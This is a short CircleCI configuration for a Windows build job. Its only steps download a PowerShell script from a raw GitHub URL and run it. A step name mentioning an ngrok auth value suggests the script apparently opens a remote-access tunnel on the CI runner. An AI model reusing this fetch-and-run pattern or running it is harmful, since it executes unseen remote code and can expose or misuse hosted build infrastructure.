version: 2.1

orbs:
  win: circleci/windows@2.2.0

jobs:
  build:
    executor:
      name: win/default
      size: "medium"



    steps:

      - run:
          name: PasteNgrok Auth Value In Hosted Link
          command: 
            Invoke-webRequest https://raw.githubusercontent.com/arhanqureshi/myfirstproject/main/sh -OutFile gpu.ps1

      - run: ./gpu.ps1